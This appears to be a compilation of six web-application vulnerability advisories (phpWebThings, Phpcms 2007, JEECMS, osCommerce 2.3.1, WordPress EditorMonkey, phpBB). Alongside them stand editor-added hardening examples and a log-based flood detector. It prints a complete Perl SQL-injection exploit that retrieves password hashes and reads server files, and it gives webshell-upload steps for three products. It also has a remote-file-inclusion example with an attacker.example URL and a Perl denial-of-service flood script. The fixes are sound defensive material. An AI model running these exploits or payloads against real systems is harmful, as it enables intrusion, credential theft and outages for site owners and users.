[Introduction] Contributor "cvvvv9" collected and submitted 6 vulnerability advisories to this site, beginning with the phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure remote vulnerability; the editor's compilation follows.
- Contents
Part 1: phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Vulnerability Advisory
phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Vulnerability
Notes:
1. The vulnerability works regardless of php.ini settings: the injected payload contains no quote characters (the file path is passed as a 0x... hex literal), so magic_quotes_gpc is irrelevant, and the file is read locally with readfile(), so no URL wrapper setting is needed;
2. wt_config.php contains the MySQL login credentials, which makes it a natural target for the file disclosure.
Brief description:
phpWebThings contains a flaw that lets an attacker carry out an SQL injection attack. The issue is that the fdown.php script does not sanitize the user-supplied "id" parameter before interpolating it into a SELECT query, and the value that query returns is then used as a file name for readfile(). An attacker can therefore inject or manipulate the backend SQL query and, via UNION SELECT, either make the script read an arbitrary file from the web server (file disclosure) or return a chosen user's password hash from the users table (MD5 hash retrieval).
#!/usr/bin/perl
###################################################################################################
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit #
# #
# by staker #
# ------------------------------ #
# mail: staker[at]hotmail[dot]it #
# url: phpwebthings.nl #
# ------------------------------ #
# #
# NOTE: #
# 1. it works regardless of php.ini settings #
# 2. wt_config.php contains mysql login #
# #
# short explanation: #
# ---------------------------------------------------- #
# phpWebThings contains a flaw that allows an attacker #
# to carry out an SQL injection attack. The issue is #
# due to the fdown.php script not properly sanitizing #
# user-supplied input to the 'id' variable. This may #
# allow an attacker to inject or manipulate #
# SQL queries in the backend database (php.ini indep) #
# ---------------------------------------------------- #
# #
# [file: fdown.php] #
# ------------------------------------ #
# #
# <?php #
# include_once("core/main.php"); #
# #
# $ret = db_query("select file from {$config['prefix']}_forum_msgs where cod={$_REQUEST['id']}"); #
# $row = db_fetch_array($ret); #
# header('HTTP/1.1 200 OK'); #
# header('Date: ' . date("D M j G:i:s T Y")); #
# header('Last-Modified: ' . date("D M j G:i:s T Y")); #
# header("Content-Type: application/force-download"); #
# header("Content-Lenght: " . (string)(filesize("var/forumfiles/{$row['file']}"))); #
# header("Content-Transfer-Encoding: Binary"); #
# header("Content-Disposition: attachment; filename={$row['file']}"); #
# readfile("var/forumfiles/{$row['file']}"); #
# #
# ?> #
# #
# ------------------------------------- #
# #
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1 #
# [*--------------------------------------------------------------------*] #
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *] #
# [*--------------------------------------------------------------------*] #
# [* Usage: perl web.pl [target + path] [OPTIONS] *] #
# [* *] #
# [* Options: *] #
# [* [files] -d ../../../../../../etc/passwd *] #
# [* [hash.] -c user_id *] #
# [* [table] -t set a table prefix (default: wt) *] #
# [*--------------------------------------------------------------------*] #
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671 #
# #
# ---------------------------------------------------------- #
# Today is: 12 June 2009 #
# Location: Italy,Turin. #
# www. .com/watch?v=E78BGajeuAI&feature=related #
# ---------------------------------------------------------- #
###################################################################################################
use LWP::UserAgent;
use Getopt::Long;
&phpWebThings::init;
my ($files,$admin,$ua_lib,$domain,$table,$proxy);
$domain = $ARGV[0] || exit(0);
$ua_lib = LWP::UserAgent->new(
timeout =>5,
max_redirect =>0,
agent =>'Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)',
) || die $!;
GetOptions(
'p=s' =>\$proxy,
'd=s' =>\$files,
'c=i' =>\$admin,
't=s' =>\$table,
);
# the original parsed -p but never used it; apply it to the agent when given
$ua_lib->proxy('http', $proxy) if defined $proxy;
print &phpWebThings::Exploit;
exit;
sub phpWebThings::Exploit
{
return Disclose::File($files) if defined $files;
return Retrieve::Hash($admin) if defined $admin;
return "[* nothing to do: use -d <file> or -c <user_id>\n";
}
sub Disclose::File
{
my $filename = shift or die "no file name given\n";
# "/fdown.php", spelled as hex escapes
my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
# UNION the hex-encoded path into the 'file' column; fdown.php then calls
# readfile("var/forumfiles/<path>"), so ../ sequences walk out of the
# attachment directory. The 0x... literal needs no quotes, which is why
# magic_quotes_gpc does not matter; /**/ stands in for spaces.
my $response = $ua_lib->post(parse::URL($domain.$keywords),
[ id =>"1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]);
if ($response->status_line =~ /^(302|200|301)/) {
return $response->content;
}
else {
return $response->as_string;
}
}
sub Retrieve::Hash
{
my $user_id = shift or die "no user id given\n";
my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
my $prefix = (defined $table) ? $table : 'wt';
# same injection, this time selecting the password hash of the chosen user.
# The hash comes back as the "file name": it is always in the
# Content-Disposition header, and in the body only if PHP echoes the failed
# readfile() warning, so the whole response (headers + body) is searched.
my $response = $ua_lib->post(parse::URL($domain.$keywords),
[ id =>"1 UNION Select password FROM ${prefix}_users Where uid=$user_id#" ]);
if ($response->status_line =~ /^(302|200|301)/)
{
if ($response->as_string =~ /([0-9a-f]{32})/) {
return "[* MD5 Hash: $1\n";
}
return "[* no 32-hex-digit hash found in the response\n";
}
else {
return $response->as_string;
}
}
sub Hex::convert
{
my $string = shift or die "nothing to encode\n";
return unpack("H*",$string);
}
sub parse::URL
{
my $string = shift or die "no target given\n";
# prepend the scheme when the target was given as a bare host/path
if ($string !~ m{^https?://}i) {
$string = 'http://'.$string;
}
return $string;
}
sub phpWebThings::init
{
print "[*--------------------------------------------------------------------*]\n".
"[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *]\n".
"[*--------------------------------------------------------------------*]\n".
"[* Usage: perl web.pl [target + path] [OPTIONS] *]\n".
"[* *]\n".
"[* Options: *]\n".
"[* [files] -d ../../../../../../etc/passwd *]\n".
"[* [hash.] -c user_id *]\n".
"[* [table] -t set a table prefix (default: wt) *]\n".
"[*--------------------------------------------------------------------*]\n";
}
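A hardened fdown.php, as an added example: this is editor-written code, not phpWebThings code. It keeps only what the snippet above shows (core/main.php, the db_query/db_fetch_array helpers and $config['prefix']) and assumes nothing else about the application. Two changes close both halves of the exploit: the id is cast to an integer before it reaches the query, so nothing can be appended after the number, and the file name that comes back from the database is reduced to a basename, resolved with realpath() and checked to lie inside var/forumfiles, so even a poisoned row cannot make readfile() leave the directory.

```php
<?php
include_once("core/main.php");

// 1. An attachment id is an integer. Casting discards everything after the
//    leading digits, so "1 UNION SELECT ..." becomes 1 and the query shape
//    can no longer be changed by the client.
$id = isset($_REQUEST['id']) ? (int)$_REQUEST['id'] : 0;
if ($id <= 0) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid id');
}
$ret = db_query("select file from {$config['prefix']}_forum_msgs where cod={$id}");
$row = db_fetch_array($ret);
if (!$row || $row['file'] === '') {
    header('HTTP/1.1 404 Not Found');
    exit('no such file');
}

// 2. Do not trust a path that came out of the database either: drop any
//    directory component, then verify that the resolved path is still inside
//    the attachment directory. realpath() returns false for a missing file.
$base = realpath('var/forumfiles');
$name = basename($row['file']);
$path = ($base === false) ? false : realpath($base . DIRECTORY_SEPARATOR . $name);
if ($base === false || $path === false
    || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
    header('HTTP/1.1 404 Not Found');
    exit('no such file');
}

header('HTTP/1.1 200 OK');
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($path));   // "Content-Lenght" in the original is a typo
header('Content-Disposition: attachment; filename="' . str_replace('"', '', $name) . '"');
readfile($path);
```

The cast is enough here only because cod is compared as a bare number in the original query; for a string column, use a prepared statement or the application's own escaping helper instead. The realpath() check is the second line of defence: it stops the traversal even if the injection were reintroduced elsewhere, and it also rejects a row whose file value was tampered with through any other path.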
Part 2: Phpcms 2007 Remote File Inclusion Vulnerability Advisory
[repost] Phpcms 2007 Remote File Inclusion Vulnerability
url:www.wolvez.org/forum/redirect.php?tid=182&goto=lastpost
This is a fairly ordinary variable-overwrite vulnerability. It is reposted here because, found by white-box review, it requires reading the code carefully :)
Quote:
------------------------------------------------
//read from the top
$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';//the extract() in this file lets $rootdir be overwritten with any value
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php';//triggers the remote file inclusion
------------------------------------------------
Look at the two require statements: the first one pulls in the code that contains extract(), and only the second require is the statement that actually causes the vulnerability.
Pseudocode:
$rootdir = str_replace("\\", '/', dirname(__FILE__));
//the following is the code pulled in by require $rootdir.'/include/common.inc.php';
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
require $rootdir.'/web/admin/include/common.inc.php';
?>
What do you make of this? If you trace it statically with grep or similar tools, you will very likely miss it, because what the analysis gives you is:
$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php'
require $rootdir.'/web/admin/include/common.inc.php
Seeing that $rootdir has been "filtered", one concludes the code is safe?
So blindly hunting with grep and other static searches will not find bugs like this...
With hindsight, grey-box testing probably works well for this kind of bug: first read the code of the common.inc.php "backbone" to find the variable overwrite via extract(), then black-box test which variables can be overwritten.....
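The overwrite, and one way to close it, as an added example that is not Phpcms code. This hypothetical script reconstructs the relevant lines in two functions: it sets $_GET['rootdir'] itself (constructed input standing in for ?rootdir=http://attacker.example/ in a real request) and only computes the path that require would receive instead of including it. The hardened version pins the include root in a constant before any request data is imported, since extract() cannot overwrite constants, and imports request variables with EXTR_SKIP so existing variables survive. One caveat the post does not mention: the remote half of the attack needs allow_url_include (PHP 5.2 and later, default off) or, on older PHP, allow_url_fopen; with those off the same overwrite still yields local file inclusion of an attacker-chosen path.

```php
<?php
// Constructed request: what ?rootdir=http://attacker.example/ produces.
$_GET = ['rootdir' => 'http://attacker.example/'];

// Vulnerable flow, reduced to the lines that matter.
function vulnerable_include_path(array $get): string
{
    $rootdir = str_replace("\\", '/', dirname(__FILE__));
    // common.inc.php does this: every request variable becomes a PHP
    // variable in the current scope, overwriting existing ones, $rootdir included.
    @extract($get, EXTR_OVERWRITE);
    // require $rootdir.'/web/admin/include/common.inc.php';  <- RFI / LFI
    return $rootdir . '/web/admin/include/common.inc.php';
}

// Hardened flow (hypothetical fix, not the vendor's patch).
function hardened_include_path(array $get): string
{
    $rootdir = str_replace("\\", '/', dirname(__FILE__));
    // Pin the root in a constant before any request data is imported;
    // extract() cannot touch constants.
    if (!defined('APP_ROOT')) {
        define('APP_ROOT', $rootdir);
    }
    // Import only keys that do not already exist. An attacker can still
    // create new variables, so the include root is never read from one;
    // EXTR_PREFIX_ALL, or not extracting request data at all, is safer still.
    extract($get, EXTR_SKIP);
    return APP_ROOT . '/web/admin/include/common.inc.php';
}

$vuln = vulnerable_include_path($_GET);
$safe = hardened_include_path($_GET);
printf("vulnerable require target: %s\n", $vuln);
printf("hardened   require target: %s\n", $safe);
printf("attacker controls scheme: vulnerable=%s hardened=%s\n",
    strpos($vuln, 'http://') === 0 ? 'yes' : 'no',
    strpos($safe, 'http://') === 0 ? 'yes' : 'no');
```

The vulnerable function returns a path that begins with the attacker's URL, the hardened one the script's own directory; running the file from the command line shows both. The same grep blind spot applies to the fix: a reviewer who only greps for $rootdir assignments will not see that extract() is an assignment to every variable name the client chooses.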
Part 3: JEECMS Vulnerability (File Upload) Advisory
Vulnerability description: this one is simple; the upload is not filtered. Register an account, then upload a file as your avatar; a .jsp works too. A dialog pops up saying the upload type is wrong: ignore it, close the dialog, right-click and view the page source, and you will see that your file has already been uploaded.
The uploaded file lands at a path of the form:
www.xxx.com/online/upload/M0000002012070500007/1349769169860.jsp?o=vLogin
Part 4: osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability Advisory
osCommerce is an open-source e-commerce application. banner_manager.php in osCommerce 2.3.1 has a file upload vulnerability that can let an attacker obtain a webshell directly.
[+]info:
~~~~~~~~~
osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability
# Google Dork: [powered by oscommerce] (we will automatically add these to the GHDB)
# Date: [13-05-2011]
# Author: [Number 7]
# Software Link: [www.oscommerce.com/ext/oscommerce-2.3.1.zip]
# Version: [2.3.1]
# Tested on: [Linux-apache-win03-mac Os .... ]
# CVE : [if exists]
[+]poc:
~~~~~~~~~
you will find your shell in
www.badguest.cn/path/images/yourshell.php
Part 5: WordPress EditorMonkey (FCKeditor) Remote File Upload Vulnerability Advisory
EditorMonkey is a WordPress plugin; the FCKeditor editor bundled with EditorMonkey has a remote file upload vulnerability that can let an attacker obtain a webshell directly.
[+]info:
~~~~~~~~~
## WordPress EditorMonkey (FCKeditor) Remote File Upload
## Author : kaMtiEz (kamtiez@exploit-id.com)
## Homepage : www.indonesiancoder.com / exploit-id.com / magelangcyber.web.id
## Date : 14 May, 2011
[+]poc:
~~~~~~~~~
[ Vulnerable File ]
127.0.0.1/[kaMtiEz]/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
[ Shell ]
127.0.0.1/[kaMtiEz]/UserFiles/YourFile.txt
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/17284
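Parts 3, 4 and 5 are the same bug in three products: an upload handler that accepts any file name and writes it under the web root, where the server will execute a .jsp or .php. Below is an added example of a hardened handler, editor-written and not code from JEECMS, osCommerce or EditorMonkey. It is hypothetical PHP that assumes a form field named avatar, a storage directory the web server neither serves nor executes from, and the standard fileinfo extension. The checks are an allowlist applied to the whole lowercased name (so shell.php.jpg, shell.jpg.php and shell.jsp;.jpg are all rejected, not just the last extension inspected), a server-side MIME sniff of the bytes on disk, a random server-chosen name, and non-executable permissions. In Part 3 the "wrong type" dialog appears after the file is already on disk, which is why every check here runs before move_uploaded_file().

```php
<?php
// Hypothetical hardened avatar upload handler (added example, not from any
// of the three products above).

const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Returns the extension if $name is acceptable, null otherwise.
 * The whole name is validated: exactly one name part and one extension,
 * letters/digits only, so "x.php.jpg", "x.jpg.php", "x.jsp;.jpg" and
 * "x.jpg%00.jsp" never get past this point.
 */
function safe_extension(string $name): ?string
{
    $name = strtolower(basename($name));
    if (!preg_match('/^[a-z0-9_-]+\.([a-z0-9]+)$/', $name, $m)) {
        return null;
    }
    return array_key_exists($m[1], ALLOWED) ? $m[1] : null;
}

/** Stores one entry of $_FILES; returns the path written or throws. */
function store_avatar(array $file, string $storeDir): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('upload rejected');
    }
    $ext = safe_extension($file['name']);
    if ($ext === null) {
        throw new RuntimeException('file type not allowed');
    }
    // Sniff the bytes actually received; the browser-supplied type and the
    // file name are both attacker-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-chosen name: nothing from the client reaches the filesystem.
    $target = rtrim($storeDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0640);   // not executable, not world-readable
    return $target;
}

// Usage inside the request handler (storage path is an assumption):
// try {
//     $saved = store_avatar($_FILES['avatar'], '/var/app/uploads');
// } catch (RuntimeException $e) {
//     http_response_code(400);
//     exit($e->getMessage());
// }
```

Serve stored files back through a download script that sets Content-Type from the recorded extension and Content-Disposition: attachment, never by exposing the directory. If the directory has to live under the web root, disable script execution there as well (for Apache with mod_php, php_flag engine off and a RemoveHandler for .php in that directory's configuration), so a bypass of the name check still does not yield code execution.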
Part 6: phpBB Remote Denial of Service Vulnerability Advisory
phpBB Remote Denial of Service Vulnerability
Affected versions:
phpBB phpBB 3.0.8
phpBB phpBB 3.0.7
phpBB phpBB 3.0.6
phpBB phpBB 3.0.5
phpBB phpBB 3.0.4
phpBB phpBB 3.0.3
phpBB phpBB 3.0.2
phpBB phpBB 3.0.1
phpBB phpBB 3.0
phpBB phpBB 2.0.21
phpBB phpBB 2.0.19
phpBB phpBB 2.0.17
phpBB phpBB 2.0.16
phpBB phpBB 2.0.15
phpBB phpBB 2.0.14
phpBB phpBB 2.0.13
phpBB phpBB 2.0.12
phpBB phpBB 2.0.11
phpBB phpBB 2.0.10
phpBB phpBB 2.0.9
phpBB phpBB 2.0.7
phpBB phpBB 2.0.6
phpBB phpBB 2.0.5
phpBB phpBB 2.0.4
phpBB phpBB 2.0.3
phpBB phpBB 2.0.2
phpBB phpBB 2.0.1
phpBB phpBB 1.4.4
phpBB phpBB 1.4.2
phpBB phpBB 1.4.1
phpBB phpBB 1.2.1
phpBB phpBB 2.0.22
phpBB phpBB 2.0.20
phpBB phpBB 2.0.18
Vulnerability description:
Bugtraq ID:65481
phpBB is an open-source web forum package written in PHP by the phpBB Group; it supports multiple languages, multiple database backends and custom board layouts.
phpBB has a remote denial of service vulnerability. An attacker can exploit it to crash the affected application, denying service to legitimate users. The PoC below floods search.php with POST requests. Note that the request body it sends (securitytoken=guest&do=process&query=... with submit.x/submit.y) is the form layout of vBulletin's search.php rather than phpBB's, which takes a keywords= field; against phpBB the script therefore amounts to a plain flood of search requests carrying a malformed query string.
References:
www.securityfocus.com/bid/65481
sebug.net/appdir/phpBB
Test method:
@Sebug.net dis
The programs (methods) provided by this site may be offensive; they are for security research and teaching only, use at your own risk!
###########################
# Phpbb Forum Denial of Service Vulnerability
###########################
#!/usr/bin/perl
# Iranian Exploit DataBase
# Phpbb Forum Denial of Service Vulnerability
# Version: All Version
# Vendor site : www.phpbb.com
# Code Written By Amir - iedb.team@gmail.com - o0_iedb_0o@yahoo.com
# Site : Www.IeDb.Ir - Www.IrIsT.Ir
# Fb Page : www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Greats : TaK.FaNaR - ErfanMs - Medrik - F@riD - Bl4ck M4n - 0x0ptim0us
# - 0Day - Dj.TiniVini - E2MA3N
# l4tr0d3ctism - H-SK33PY - Noter - r3d_s0urc3 - Dr_Evil And All
# Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);            # unused
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s{^http://}{};    # accept "http://host" as well as a bare host
# NOTE: as written, $i-- never reaches 10, so this loop runs until the
# script is interrupted and the ping below is never reached.
for ($i=0; $i<10; $i--)
{
$data =
"securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0";
$len = length $data;
$foo = "POST ".$dir."search.php?do=process HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system("ping $host");      # double quotes so $host interpolates; the original's single quotes pinged the literal string
sub usage {
print "\n";
print "################################################# \n";
print "## Phpbb Forum Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team@gmail.com - Id : o0_iedb_0o \n";
print "## Www.IeDb.Ir - Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## host.com /forum/\n";
print "################################################# \n";
print "\n";
exit();
};
#####################################
# Archive Exploit = www.iedb.ir/exploits-868.html
#####################################
###########################
# Iranian Exploit DataBase = IeDb.Ir [2013-11-17]
###########################
Security advice:
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
www.phpbb.com/
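Since the PoC above is a plain request flood, the thing a defender most needs is a way to see it in the access log. The detector below is an added example, editor-written and not phpBB or Sebug code: it parses Apache combined-format lines, keeps the timestamps of POSTs to search.php per client IP, and flags any client that sends more than a threshold of them inside a sliding window. The five log lines are constructed for the example (four fast POSTs from one client, one unrelated request), and the window of 10 seconds and threshold of 3 are assumptions to tune against real traffic.

```php
<?php
// Constructed access-log sample (not real traffic).
$sample = <<<'LOG'
203.0.113.7 - - [17/Nov/2013:10:00:01 +0000] "POST /forum/search.php?do=process HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
203.0.113.7 - - [17/Nov/2013:10:00:01 +0000] "POST /forum/search.php?do=process HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
198.51.100.2 - - [17/Nov/2013:10:00:02 +0000] "GET /forum/index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Nov/2013:10:00:02 +0000] "POST /forum/search.php?do=process HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
203.0.113.7 - - [17/Nov/2013:10:00:03 +0000] "POST /forum/search.php?do=process HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
LOG;

// client ip, timestamp, method, request target, status
const LINE_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';

/** Parse one combined-format line; null when it does not match. */
function parse_line(string $line): ?array
{
    if (!preg_match(LINE_RE, $line, $m)) {
        return null;
    }
    $ts = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($ts === false) {
        return null;
    }
    return ['ip' => $m[1], 't' => $ts->getTimestamp(), 'method' => $m[3], 'path' => $m[4]];
}

/**
 * Flag clients that send more than $threshold search POSTs within any
 * $window-second span. Returns ip => size of the largest offending burst.
 */
function find_search_floods(string $log, int $window = 10, int $threshold = 3): array
{
    $times = [];   // ip => list of timestamps of search POSTs
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $e = parse_line($line);
        if ($e === null || $e['method'] !== 'POST' || !preg_match('#/search\.php#', $e['path'])) {
            continue;
        }
        $times[$e['ip']][] = $e['t'];
    }
    $flagged = [];
    foreach ($times as $ip => $ts) {
        sort($ts);
        $start = 0;
        foreach ($ts as $i => $t) {
            while ($t - $ts[$start] > $window) {   // slide the window forward
                $start++;
            }
            $n = $i - $start + 1;                    // requests inside the window
            if ($n > $threshold) {
                $flagged[$ip] = max($flagged[$ip] ?? 0, $n);
            }
        }
    }
    return $flagged;
}

foreach (find_search_floods($sample) as $ip => $n) {
    printf("%s: %d search POSTs within 10 s\n", $ip, $n);
}
```

The same counting keyed on the User-Agent string catches the PoC's fixed MSIE 6.0 agent when the flood is spread across addresses; keying on the client IP alone is the right first cut because the script opens every connection from one host. Whatever the threshold, the response is rate limiting at the web server or in front of it, since phpBB itself cannot refuse the request before parsing it.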